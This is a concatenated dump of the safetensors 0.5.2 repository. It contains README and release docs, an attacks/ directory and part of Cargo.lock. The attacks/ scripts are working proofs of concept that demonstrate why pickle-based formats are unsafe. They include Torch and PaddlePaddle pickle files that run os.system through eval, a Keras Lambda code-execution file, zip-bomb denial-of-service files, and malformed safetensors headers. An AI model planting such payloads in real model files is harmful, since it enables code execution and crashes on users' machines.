liability. END OF TERMS AND CONDITIONS APPENDIX: How to apply the Apache License to your work. To apply the Apache License to your work, attach the following boilerplate notice, with the fields enclosed by brackets "[]" replaced with your own identifying information. (Don't include the brackets!) The text should be enclosed in the appropriate comment syntax for the file format. We also recommend that a file or class name and description of purpose be included on the same "printed page" as the copyright notice for easier identification within third-party archives. Copyright [yyyy] [name of copyright owner] Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. 
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. safetensors-0.5.2/Makefile000066400000000000000000000001311473753372300155230ustar00rootroot00000000000000doc: cd safetensors && cargo readme > README.md && cargo readme > ../README.md && cd .. safetensors-0.5.2/README.md000066400000000000000000000244131473753372300153530ustar00rootroot00000000000000

Hugging Face Safetensors Library

Python [![Pypi](https://img.shields.io/pypi/v/safetensors.svg)](https://pypi.org/pypi/safetensors/) [![Documentation](https://img.shields.io/website/http/huggingface.co/docs/safetensors/index.svg?label=docs)](https://huggingface.co/docs/safetensors/index) [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) [![Downloads](https://static.pepy.tech/badge/safetensors/month)](https://pepy.tech/project/safetensors) Rust [![Crates.io](https://img.shields.io/crates/v/safetensors.svg)](https://crates.io/crates/safetensors) [![Documentation](https://docs.rs/safetensors/badge.svg)](https://docs.rs/safetensors/) [![Codecov](https://codecov.io/github/huggingface/safetensors/coverage.svg?branch=main)](https://codecov.io/gh/huggingface/safetensors) [![Dependency status](https://deps.rs/repo/github/huggingface/safetensors/status.svg?path=safetensors)](https://deps.rs/repo/github/huggingface/safetensors?path=safetensors) # safetensors ## Safetensors This repository implements a new simple format for storing tensors safely (as opposed to pickle) and that is still fast (zero-copy). ### Installation #### Pip You can install safetensors via the pip manager: ```bash pip install safetensors ``` #### From source For the sources, you need Rust ```bash # Install Rust curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh # Make sure it's up to date and using stable channel rustup update git clone https://github.com/huggingface/safetensors cd safetensors/bindings/python pip install setuptools_rust pip install -e . ``` ### Getting started ```python import torch from safetensors import safe_open from safetensors.torch import save_file tensors = { "weight1": torch.zeros((1024, 1024)), "weight2": torch.zeros((1024, 1024)) } save_file(tensors, "model.safetensors") tensors = {} with safe_open("model.safetensors", framework="pt", device="cpu") as f: for key in f.keys(): tensors[key] = f.get_tensor(key) ``` [Python documentation](https://huggingface.co/docs/safetensors/index) ### Format - 8 bytes: `N`, an unsigned little-endian 64-bit integer, containing the size of the header - N bytes: a JSON UTF-8 string representing the header. - The header data MUST begin with a `{` character (0x7B). - The header data MAY be trailing padded with whitespace (0x20). - The header is a dict like `{"TENSOR_NAME": {"dtype": "F16", "shape": [1, 16, 256], "data_offsets": [BEGIN, END]}, "NEXT_TENSOR_NAME": {...}, ...}`, - `data_offsets` point to the tensor data relative to the beginning of the byte buffer (i.e. not an absolute position in the file), with `BEGIN` as the starting offset and `END` as the one-past offset (so total tensor byte size = `END - BEGIN`). - A special key `__metadata__` is allowed to contain free form string-to-string map. Arbitrary JSON is not allowed, all values must be strings. - Rest of the file: byte-buffer. Notes: - Duplicate keys are disallowed. Not all parsers may respect this. - In general the subset of JSON is implicitly decided by `serde_json` for this library. Anything obscure might be modified at a later time, that odd ways to represent integer, newlines and escapes in utf-8 strings. This would only be done for safety concerns - Tensor values are not checked against, in particular NaN and +/-Inf could be in the file - Empty tensors (tensors with 1 dimension being 0) are allowed. They are not storing any data in the databuffer, yet retaining size in the header. 
They don't really bring a lot of values but are accepted since they are valid tensors from traditional tensor libraries perspective (torch, tensorflow, numpy, ..). - 0-rank Tensors (tensors with shape `[]`) are allowed, they are merely a scalar. - The byte buffer needs to be entirely indexed, and cannot contain holes. This prevents the creation of polyglot files. - Endianness: Little-endian. moment. - Order: 'C' or row-major. ### Yet another format ? The main rationale for this crate is to remove the need to use `pickle` on `PyTorch` which is used by default. There are other formats out there used by machine learning and more general formats. Let's take a look at alternatives and why this format is deemed interesting. This is my very personal and probably biased view: | Format | Safe | Zero-copy | Lazy loading | No file size limit | Layout control | Flexibility | Bfloat16/Fp8 | ----------------------- | --- | --- | --- | --- | --- | --- | --- | | pickle (PyTorch) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | | H5 (Tensorflow) | 🗸 | ✗ | 🗸 | 🗸 | ~ | ~ | ✗ | | SavedModel (Tensorflow) | 🗸 | ✗ | ✗ | 🗸 | 🗸 | ✗ | 🗸 | | MsgPack (flax) | 🗸 | 🗸 | ✗ | 🗸 | ✗ | ✗ | 🗸 | | Protobuf (ONNX) | 🗸 | ✗ | ✗ | ✗ | ✗ | ✗ | 🗸 | | Cap'n'Proto | 🗸 | 🗸 | ~ | 🗸 | 🗸 | ~ | ✗ | | Arrow | ? | ? | ? | ? | ? | ? | ✗ | | Numpy (npy,npz) | 🗸 | ? | ? | ✗ | 🗸 | ✗ | ✗ | | pdparams (Paddle) | ✗ | ✗ | ✗ | 🗸 | ✗ | 🗸 | 🗸 | | SafeTensors | 🗸 | 🗸 | 🗸 | 🗸 | 🗸 | ✗ | 🗸 | - Safe: Can I use a file randomly downloaded and expect not to run arbitrary code ? - Zero-copy: Does reading the file require more memory than the original file ? - Lazy loading: Can I inspect the file without loading everything ? And loading only some tensors in it without scanning the whole file (distributed setting) ? - Layout control: Lazy loading, is not necessarily enough since if the information about tensors is spread out in your file, then even if the information is lazily accessible you might have to access most of your file to read the available tensors (incurring many DISK -> RAM copies). Controlling the layout to keep fast access to single tensors is important. - No file size limit: Is there a limit to the file size ? - Flexibility: Can I save custom code in the format and be able to use it later with zero extra code ? (~ means we can store more than pure tensors, but no custom code) - Bfloat16/Fp8: Does the format support native bfloat16/fp8 (meaning no weird workarounds are necessary)? This is becoming increasingly important in the ML world. ### Main oppositions - Pickle: Unsafe, runs arbitrary code - H5: Apparently now discouraged for TF/Keras. Seems like a great fit otherwise actually. Some classic use after free issues: . On a very different level than pickle security-wise. Also 210k lines of code vs ~400 lines for this lib currently. - SavedModel: Tensorflow specific (it contains TF graph information). - MsgPack: No layout control to enable lazy loading (important for loading specific parts in distributed setting) - Protobuf: Hard 2Go max file size limit - Cap'n'proto: Float16 support is not present [link](https://capnproto.org/language.html#built-in-types) so using a manual wrapper over a byte-buffer would be necessary. Layout control seems possible but not trivial as buffers have limitations [link](https://stackoverflow.com/questions/48458839/capnproto-maximum-filesize). - Numpy (npz): No `bfloat16` support. Vulnerable to zip bombs (DOS). Not zero-copy. - Arrow: No `bfloat16` support. 
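To make the comparison concrete: the format described in the Format section above is simple enough that a file's header can be inspected with a few lines of standard-library Python. The sketch below is illustrative only; the helper name, the size cap (mirroring the 100MB header limit mentioned under Benefits below) and the error handling are our own, and real loading should go through the `safetensors` library itself.

```python
import json
import struct


def read_safetensors_header(path, max_header_size=100_000_000):
    """Illustrative header reader; not part of the safetensors library."""
    with open(path, "rb") as f:
        # 8 bytes: N, an unsigned little-endian 64-bit integer giving the header size
        (n,) = struct.unpack("<Q", f.read(8))
        if n > max_header_size:
            raise ValueError("header claims an unreasonably large size")
        # N bytes: JSON UTF-8 header (may be right-padded with spaces)
        header = json.loads(f.read(n).decode("utf-8"))
    metadata = header.pop("__metadata__", None)
    # Remaining entries map tensor names to dtype, shape and [BEGIN, END)
    # data_offsets, relative to the start of the byte buffer (byte 8 + N of the file)
    return header, metadata


# Example with the file created in "Getting started":
# tensors, metadata = read_safetensors_header("model.safetensors")
# for name, info in tensors.items():
#     print(name, info["dtype"], info["shape"], info["data_offsets"])
```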
### Notes - Zero-copy: No format is really zero-copy in ML, it needs to go from disk to RAM/GPU RAM (that takes time). On CPU, if the file is already in cache, then it can truly be zero-copy, whereas on GPU there is not such disk cache, so a copy is always required but you can bypass allocating all the tensors on CPU at any given point. SafeTensors is not zero-copy for the header. The choice of JSON is pretty arbitrary, but since deserialization is <<< of the time required to load the actual tensor data and is readable I went that way, (also space is <<< to the tensor data). - Endianness: Little-endian. This can be modified later, but it feels really unnecessary at the moment. - Order: 'C' or row-major. This seems to have won. We can add that information later if needed. - Stride: No striding, all tensors need to be packed before being serialized. I have yet to see a case where it seems useful to have a strided tensor stored in serialized format. ### Benefits Since we can invent a new format we can propose additional benefits: - Prevent DOS attacks: We can craft the format in such a way that it's almost impossible to use malicious files to DOS attack a user. Currently, there's a limit on the size of the header of 100MB to prevent parsing extremely large JSON. Also when reading the file, there's a guarantee that addresses in the file do not overlap in any way, meaning when you're loading a file you should never exceed the size of the file in memory - Faster load: PyTorch seems to be the fastest file to load out in the major ML formats. However, it does seem to have an extra copy on CPU, which we can bypass in this lib by using `torch.UntypedStorage.from_file`. Currently, CPU loading times are extremely fast with this lib compared to pickle. GPU loading times are as fast or faster than PyTorch equivalent. Loading first on CPU with memmapping with torch, and then moving all tensors to GPU seems to be faster too somehow (similar behavior in torch pickle) - Lazy loading: in distributed (multi-node or multi-gpu) settings, it's nice to be able to load only part of the tensors on the various models. For [BLOOM](https://huggingface.co/bigscience/bloom) using this format enabled to load the model on 8 GPUs from 10mn with regular PyTorch weights down to 45s. This really speeds up feedbacks loops when developing on the model. For instance you don't have to have separate copies of the weights when changing the distribution strategy (for instance Pipeline Parallelism vs Tensor Parallelism). License: Apache-2.0 safetensors-0.5.2/RELEASE.md000066400000000000000000000120571473753372300154770ustar00rootroot00000000000000## How to release # Before the release Simple checklist on how to make releases for `safetensors`. - Freeze `main` branch. - Run all tests (Check CI has properly run) - If any significant work, check benchmarks: - `cd safetensors && cargo bench` (needs to be run on latest release tag to measure difference if it's your first time) - Run all `transformers` tests. (`transformers` is a big user of `safetensors` we need to make sure we don't break it, testing is one way to make sure nothing unforeseen has been done.) - Run all fast tests at the VERY least (not just the tokenization tests). (`RUN_PIPELINE_TESTS=1 CUDA_VISIBLE_DEVICES=-1 pytest -sv tests/`) - When all *fast* tests work, then we can also (it's recommended) run the whole `transformers` test suite. - Rebase this [PR](https://github.com/huggingface/transformers/pull/16708). 
This will create new docker images ready to run the tests suites with `safetensors` from the main branch. - Wait for actions to finish - Rebase this [PR](https://github.com/huggingface/transformers/pull/16712) This will run the actual full test suite. - Check the results. - **If any breaking change has been done**, make sure the version can safely be increased for transformers users (`safetensors` version need to make sure users don't upgrade before `transformers` has). [link](https://github.com/huggingface/transformers/blob/main/setup.py#L154) For instance `safetensors>=0.10,<0.11` so we can safely upgrade to `0.11` without impacting current users - Then start a new PR containing all desired code changes from the following steps. - You will `Create release` after the code modifications are on `master`. # Rust - `safetensors` (rust, python & node) versions don't have to be in sync but it's very common to release for all versions at once for new features. - Edit `Cargo.toml` to reflect new version - Edit `CHANGELOG.md`: - Add relevant PRs that were added (python PRs do not belong for instance). - Add links at the end of the files. - Go to [Releases](https://github.com/huggingface/safetensors/releases) - Create new Release: - Mark it as pre-release - Use new version name with a new tag (create on publish) `vX.X.X`. - Copy paste the new part of the `CHANGELOG.md` - âš ï¸ Click on `Publish release`. This will start the whole process of building a uploading the new version on `crates.io`, there's no going back after this - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. # Python - Edit `bindings/python/setup.py` to reflect new version. - Edit `bindings/python/py_src/safetensors/__init__.py` to reflect new version. - Edit `CHANGELOG.md`: - Add relevant PRs that were added (node PRs do not belong for instance). - Add links at the end of the files. - Go to [Releases](https://github.com/huggingface/safetensors/releases) - Create new Release: - Mark it as pre-release - Use new version name with a new tag (create on publish) `python-vX.X.X`. - Copy paste the new part of the `CHANGELOG.md` - âš ï¸ Click on `Publish release`. This will start the whole process of building a uploading the new version on `pypi`, there's no going back after this - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. - This CI/CD has 3 distinct builds, `Pypi`(normal), `conda` and `extra`. `Extra` is REALLY slow (~4h), this is normal since it has to rebuild many things, but enables the wheel to be available for old Linuxes # Node - Edit `bindings/node/package.json` to reflect new version. - Edit `CHANGELOG.md`: - Add relevant PRs that were added (python PRs do not belong for instance). - Add links at the end of the files. - Go to [Releases](https://github.com/huggingface/safetensors/releases) - Create new Release: - Mark it as pre-release - Use new version name with a new tag (create on publish) `node-vX.X.X`. - Copy paste the new part of the `CHANGELOG.md` - âš ï¸ Click on `Publish release`. 
This will start the whole process of building a uploading the new version on `npm`, there's no going back after this - Go to the [Actions](https://github.com/huggingface/safetensors/actions) tab and check everything works smoothly. - If anything fails, you need to fix the CI/CD to make it work again. Since your package was not uploaded to the repository properly, you can try again. # Testing the CI/CD for release If you want to make modifications to the CI/CD of the release GH actions, you need to : - **Comment the part that uploads the artifacts** to `crates.io`, `PyPi` or `npm`. - Change the trigger mechanism so it can trigger every time you push to your branch. - Keep pushing your changes until the artifacts are properly created. safetensors-0.5.2/attacks/000077500000000000000000000000001473753372300155225ustar00rootroot00000000000000safetensors-0.5.2/attacks/README.md000066400000000000000000000056561473753372300170150ustar00rootroot00000000000000The purpose of this directory is to showcase various attacks (and creating your own). # Torch Arbitrary code execution Try it out. This will create a seemingly innocuous `torch_ace.pt` file. ``` python torch_ace_create.py python torch_ace_get_pwned.py ``` # PaddlePaddle Arbitrary code execution Try it out. This will create a seemingly innocuous `paddle_ace.pdparams` file. ``` python paddle_ace_create.py python paddle_ace_get_pwned.py ``` # Tensorflow (Keras) Arbitrary Code execution (does not affect `transformers`) Try it out. This will create a seemingly innocuous `tf_ace.h5` file. ``` python tf_dos_create.py python tf_dos_get_pwned.py ``` # Torch Denial of Service (OOM kills the running process) Try it out. This will create a seemingly innocuous `torch_dos.pt` file. ``` python torch_dos_create.py python torch_dos_get_pwned.py ``` # Numpy Denial of Service (OOM kills the running process) Try it out. This will create a seemingly innocuous `numpy_dos.npz` file. ``` python numpy_dos_create.py python numpy_dos_get_pwned.py ``` # Safetensors abuse attempts In order to try and check the limits, we also try to abuse the current format. Please send ideas! A few things can be abused: - Proposal 1: The initial 8 bytes, which could be too big with regards to the file. This crashes, and crashes early (Out of bounds) (Attempt #1). - Proposal 2: The initial header is JSON, an attacker could use a 4Go JSON file to delay the loads. Debattable how much of an attack this is, but at least it's impossible to "bomb" (like the DOS attacks above) where the files are vastly smaller than their expanded version (because of zip abuse). Various "protections" could be put in place, like a header proportion cap (header should always be <<< of the size of the file). (Attempt #2) - Proposal 3: The offsets could be negative, out of the file. This is all crashing by default. - Proposal 4: The offsets could overlap. ~~This is actually OK.~~ This is NOT ok. While testing Proposal 2, I realized that the tensors themselves where all allocated, and gave me an idea for a DOS exploit where you would have a relatively small file a few megs tops, but defining many tensors on the same overlapping part of the file, it was essentially a DOS attack. The mitigation is rather simple, we sanitize the fact that the offsets must be contiguous and non overlapping. - Proposal 5: The offsets could mismatch the declared shapes + dtype. This validated against. 
- Proposal 6: The file being mmaped could be modified while it's opened (attacker has access to your filesystem, seems like you're already pwned). - Proposal 7: serde JSON deserialization abuse (nothing so far: https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=serde). It doesn't mean there isn't a flaw. Same goes for the actual rust compiled binary. ``` python safetensors_abuse_attempt_1.py python safetensors_abuse_attempt_2.py python safetensors_abuse_attempt_3.py ``` safetensors-0.5.2/attacks/numpy_dos_create.py000066400000000000000000000005171473753372300214370ustar00rootroot00000000000000from zipfile import ZIP_DEFLATED, ZipFile FILESIZE = 40 * 1000 # 40 Go BUFFER = b"\0" * 1000 * 1000 # 1Mo outfilename = "numpy_dos.npz" with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: with outzip.open("weights.npy", "w", force_zip64=True) as f: for i in range(FILESIZE): f.write(BUFFER) safetensors-0.5.2/attacks/numpy_dos_get_pwned.py000066400000000000000000000006631473753372300221520ustar00rootroot00000000000000import os import numpy as np filename = "numpy_dos.npz" print( f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." ) print("Be careful this might crash your computer by reserving way too much RAM") input("Press Enter to continue") archive = np.load(filename) weights = archive["weight"] assert np.allclose(weights, np.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/attacks/paddle_ace_create.py000066400000000000000000000027361473753372300214700ustar00rootroot00000000000000import paddle import numpy as np from collections import Iterable, OrderedDict def _parse_every_object(obj, condition_func, convert_func): if condition_func(obj): return convert_func(obj) elif isinstance(obj, (dict, OrderedDict, list)): if isinstance(obj, list): keys = range(len(obj)) else: keys = list(obj.keys()) for key in keys: if condition_func(obj[key]): obj[key] = convert_func(obj[key]) else: obj[key] = _parse_every_object( obj[key], condition_func, convert_func ) return obj elif isinstance(obj, tuple): return tuple( _parse_every_object(list(obj), condition_func, convert_func) ) elif isinstance(obj, set): object(list(obj), condition_func, convert_func) else: return obj # hack _parse_every_object method paddle.framework.io._parse_every_object = _parse_every_object class BadDict(dict): def __init__(self, src: str, **kwargs): super().__init__(**kwargs) self.src = src def __reduce__(self): return ( eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()), ) paddle.save( [BadDict( 'echo "pwned your computer, I can do anything I want."', **{"weight": paddle.zeros((2, 2))}, )], "paddle_ace.pdparams", ) safetensors-0.5.2/attacks/paddle_ace_get_pwned.py000066400000000000000000000003101473753372300221630ustar00rootroot00000000000000import paddle weights = paddle.load("paddle_ace.pdparams")[0] assert list(weights.keys()) == ["weight"] assert paddle.allclose(weights["weight"], paddle.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/attacks/safetensors_abuse_attempt_1.py000066400000000000000000000010311473753372300235600ustar00rootroot00000000000000import torch from safetensors.torch import load_file, save_file filename = "safetensors_abuse_attempt_1.safetensors" def create_payload(): weights = {"weight": torch.zeros((2, 2))} save_file(weights, filename) with open(filename, "r+b") as f: f.seek(0) # Now the header claims 2**32 - xx even though the file is small n = 1000 n_bytes = n.to_bytes(8, "little") 
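        # Overwrite the 8-byte little-endian header-size field at the start of the file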
f.write(n_bytes) create_payload() # This properly crashes with an out of bounds exception. test = load_file(filename) safetensors-0.5.2/attacks/safetensors_abuse_attempt_2.py000066400000000000000000000014271473753372300235720ustar00rootroot00000000000000import datetime import json import os from safetensors.torch import load_file filename = "safetensors_abuse_attempt_2.safetensors" def create_payload(): shape = [2, 2] n = shape[0] * shape[1] * 4 metadata = { f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 1000 * 10) } binary = json.dumps(metadata).encode("utf-8") n = len(binary) n_header = n.to_bytes(8, "little") with open(filename, "wb") as f: f.write(n_header) f.write(binary) f.write(b"\0" * n) create_payload() print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") start = datetime.datetime.now() test = load_file(filename) print(f"Loading the file took {datetime.datetime.now() - start}") safetensors-0.5.2/attacks/safetensors_abuse_attempt_3.py000066400000000000000000000014061473753372300235700ustar00rootroot00000000000000import datetime import json import os from safetensors.torch import load_file filename = "safetensors_abuse_attempt_2.safetensors" def create_payload(): shape = [200, 200] n = shape[0] * shape[1] * 4 metadata = {f"weight_{i}": {"dtype": "F32", "shape": shape, "data_offsets": [0, n]} for i in range(1000 * 100)} binary = json.dumps(metadata).encode("utf-8") n = len(binary) n_header = n.to_bytes(8, "little") with open(filename, "wb") as f: f.write(n_header) f.write(binary) f.write(b"\0" * n) create_payload() print(f"The file {filename} is {os.path.getsize(filename) / 1000/ 1000} Mo") start = datetime.datetime.now() test = load_file(filename) print(f"Loading the file took {datetime.datetime.now() - start}") safetensors-0.5.2/attacks/tf_ace_create.py000066400000000000000000000007431473753372300206440ustar00rootroot00000000000000import tensorflow as tf def exec_(*args, **kwargs): import os os.system('echo "########################################\nI own you.\n########################################"') return 10 num_classes = 10 input_shape = (28, 28, 1) model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) ### # model.compile(loss="categorical_crossentropy", optimizer="adam", metrics=["accuracy"]) model.save("tf_ace.h5") ### safetensors-0.5.2/attacks/tf_ace_get_pwned.py000066400000000000000000000007511473753372300213540ustar00rootroot00000000000000import base64 import json import h5py import tensorflow as tf new_model = tf.keras.models.load_model("tf.h5") print("Transformers is not vulnerable to this, as it uses h5 directly.") print("Keras uses a pickled code of the function within the `h5` attrs of the file") print("Let's show you the marshalled code") with h5py.File("tf_ace.h5") as f: data = json.loads(f.attrs["model_config"]) print(base64.b64decode(data["config"]["layers"][-1]["config"]["function"][0])) pass safetensors-0.5.2/attacks/tf_safe_ace_create.py000066400000000000000000000006341473753372300216410ustar00rootroot00000000000000import tensorflow as tf def exec_(*args, **kwargs): import os os.system('echo "########################################\nI own you.\n########################################"') return 10 num_classes = 10 input_shape = (28, 28, 1) model = tf.keras.Sequential([tf.keras.Input(shape=input_shape), tf.keras.layers.Lambda(exec_, name="custom")]) model.save("tf_ace.keras", save_format="keras_v3") 
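The abuse-attempt scripts above all manipulate the same part of the byte layout: the 8-byte little-endian header length at the start of the file and the JSON header that follows it. Purely as an illustration (this is not one of the repository's attack scripts, and `model.safetensors` below is just a placeholder path), here is a minimal sketch of the kind of manual header sanity check the README's mitigations describe:

```python
# Illustrative sketch only: manually inspect a safetensors header before loading,
# mirroring the checks that Proposals 1 and 2 in the README above try to defeat.
import json
import os
import struct


def inspect_header(filename, max_header_ratio=0.5):
    file_size = os.path.getsize(filename)
    with open(filename, "rb") as f:
        # The first 8 bytes are a little-endian u64 giving the size of the JSON header.
        (header_len,) = struct.unpack("<Q", f.read(8))
        if 8 + header_len > file_size:
            # Proposal 1: a header length pointing past the end of the file.
            raise ValueError(f"Header claims {header_len} bytes but the file only has {file_size}")
        if header_len > max_header_ratio * file_size:
            # Proposal 2: an absurdly large (but still in-bounds) JSON header.
            raise ValueError("Header is suspiciously large compared to the file")
        return json.loads(f.read(header_len))


# Example usage (placeholder path):
# print(list(inspect_header("model.safetensors").keys()))
```

The actual Rust implementation performs stricter validation than this sketch (including the offset contiguity and overlap checks mentioned under Proposal 4); the sketch only shows where the header-size attacks live in the file layout.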
safetensors-0.5.2/attacks/tf_safe_ace_get_pwned.py000066400000000000000000000001201473753372300223400ustar00rootroot00000000000000import tensorflow as tf new_model = tf.keras.models.load_model("tf_ace.keras") safetensors-0.5.2/attacks/torch_ace_create.py000066400000000000000000000007571473753372300213570ustar00rootroot00000000000000import torch class BadDict(dict): def __init__(self, src: str, **kwargs): super().__init__(**kwargs) self.src = src def __reduce__(self): return ( eval, (f"os.system('{self.src}') or dict()",), None, None, iter(self.items()), ) torch.save( BadDict( 'echo "pwned your computer, I can do anything I want."', **{"weight": torch.zeros((2, 2))}, ), "torch_ace.pt", ) safetensors-0.5.2/attacks/torch_ace_get_pwned.py000066400000000000000000000002721473753372300220600ustar00rootroot00000000000000import torch weights = torch.load("torch_ace.pt") assert list(weights.keys()) == ["weight"] assert torch.allclose(weights["weight"], torch.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/attacks/torch_dos_create.py000066400000000000000000000012771473753372300214120ustar00rootroot00000000000000import os from zipfile import ZIP_DEFLATED, ZipFile import torch FILESIZE = 40 * 1000 # 40 Go BUFFER = b"\0" * 1000 * 1000 # 1 Mo filename = "torch_dos_tmp.pt" torch.save({"weight": torch.zeros((2, 2))}, filename) with ZipFile(filename, "r") as torch_zip: outfilename = "torch_dos.pt" with ZipFile(outfilename, "w", compression=ZIP_DEFLATED) as outzip: outzip.writestr("archive/data.pkl", torch_zip.open("archive/data.pkl").read()) outzip.writestr("archive/version", torch_zip.open("archive/version").read()) with outzip.open("archive/data/0", "w", force_zip64=True) as f: for i in range(FILESIZE): f.write(BUFFER) os.remove(filename) safetensors-0.5.2/attacks/torch_dos_get_pwned.py000066400000000000000000000007151473753372300221170ustar00rootroot00000000000000import os import torch filename = "torch_dos.pt" print( f"We're going to load {repr(filename)} which is {os.path.getsize(filename) / 1000 / 1000} Mb so it should be fine." 
) print("Be careful this might crash your computer by reserving way too much RAM") input("Press Enter to continue") weights = torch.load(filename) assert list(weights.keys()) == ["weight"] assert torch.allclose(weights["weight"], torch.zeros((2, 2))) print("The file looks fine !") safetensors-0.5.2/bindings/000077500000000000000000000000001473753372300156655ustar00rootroot00000000000000safetensors-0.5.2/bindings/.DS_Store000066400000000000000000000140041473753372300173470ustar00rootroot00000000000000Bud1onbwspblobpythonbwspblob¸bplist00Ö ]ShowStatusBar[ShowToolbar[ShowTabView_ContainerShowSidebar\WindowBounds[ShowSidebar  _{{900, 282}, {900, 281}} #/;R_klmnoŠ ‹pythonvSrnlong  @€ @€ @€ @ EDSDB `€ @€ @€ @safetensors-0.5.2/bindings/python/000077500000000000000000000000001473753372300172065ustar00rootroot00000000000000safetensors-0.5.2/bindings/python/.gitignore000066400000000000000000000012551473753372300212010ustar00rootroot00000000000000/target # Byte-compiled / optimized / DLL files __pycache__/ .pytest_cache/ *.py[cod] # C extensions *.so # Distribution / packaging .Python .venv/ env/ bin/ build/ develop-eggs/ dist/ eggs/ lib/ lib64/ parts/ sdist/ var/ include/ man/ venv/ *.egg-info/ .installed.cfg *.egg # Installer logs pip-log.txt pip-delete-this-directory.txt pip-selfcheck.json # Unit test / coverage reports htmlcov/ .tox/ .coverage .cache nosetests.xml coverage.xml # Translations *.mo # Mr Developer .mr.developer.cfg .project .pydevproject # Rope .ropeproject # Django stuff: *.log *.pot .DS_Store # Sphinx documentation docs/_build/ # PyCharm .idea/ # VSCode .vscode/ # Pyenv .python-versionsafetensors-0.5.2/bindings/python/Cargo.lock000066400000000000000000000137471473753372300211270ustar00rootroot00000000000000# This file is automatically @generated by Cargo. # It is not intended for manual editing. 
version = 4 [[package]] name = "autocfg" version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "ace50bade8e6234aa140d9a2f552bbee1db4d353f69b8217bc503490fc1a9f26" [[package]] name = "cfg-if" version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" [[package]] name = "heck" version = "0.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "2304e00983f87ffb38b55b444b5e3b60a884b5d30c0fca7d82fe33449bbe55ea" [[package]] name = "indoc" version = "2.0.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b248f5224d1d606005e02c97f5aa4e88eeb230488bcc03bc9ca4d7991399f2b5" [[package]] name = "itoa" version = "1.0.14" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d75a2a4b1b190afb6f5425f10f6a8f959d2ea0b9c2b1d79553551850539e4674" [[package]] name = "libc" version = "0.2.169" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "b5aba8db14291edd000dfcc4d620c7ebfb122c613afb886ca8803fa4e128a20a" [[package]] name = "memchr" version = "2.7.4" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "78ca9ab1a0babb1e7d5695e3530886289c18cf2f87ec19a575a0abdce112e3a3" [[package]] name = "memmap2" version = "0.9.5" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fd3f7eed9d3848f8b98834af67102b720745c4ec028fcd0aa0239277e7de374f" dependencies = [ "libc", ] [[package]] name = "memoffset" version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "488016bfae457b036d996092f6cb448677611ce4449e970ceaf42695203f218a" dependencies = [ "autocfg", ] [[package]] name = "once_cell" version = "1.20.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "1261fe7e33c73b354eab43b1273a57c8f967d0391e80353e51f764ac02cf6775" [[package]] name = "portable-atomic" version = "1.10.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "280dc24453071f1b63954171985a0b0d30058d287960968b9b2aca264c8d4ee6" [[package]] name = "proc-macro2" version = "1.0.92" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "37d3544b3f2748c54e147655edb5025752e2303145b5aefb3c3ea2c78b973bb0" dependencies = [ "unicode-ident", ] [[package]] name = "pyo3" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "e484fd2c8b4cb67ab05a318f1fd6fa8f199fcc30819f08f07d200809dba26c15" dependencies = [ "cfg-if", "indoc", "libc", "memoffset", "once_cell", "portable-atomic", "pyo3-build-config", "pyo3-ffi", "pyo3-macros", "unindent", ] [[package]] name = "pyo3-build-config" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "dc0e0469a84f208e20044b98965e1561028180219e35352a2afaf2b942beff3b" dependencies = [ "once_cell", "target-lexicon", ] [[package]] name = "pyo3-ffi" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "eb1547a7f9966f6f1a0f0227564a9945fe36b90da5a93b3933fc3dc03fae372d" dependencies = [ "libc", "pyo3-build-config", ] [[package]] name = "pyo3-macros" version = "0.23.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fdb6da8ec6fa5cedd1626c886fc8749bdcbb09424a86461eb8cdf096b7c33257" dependencies = [ "proc-macro2", "pyo3-macros-backend", "quote", "syn", ] [[package]] name = "pyo3-macros-backend" version = "0.23.3" 
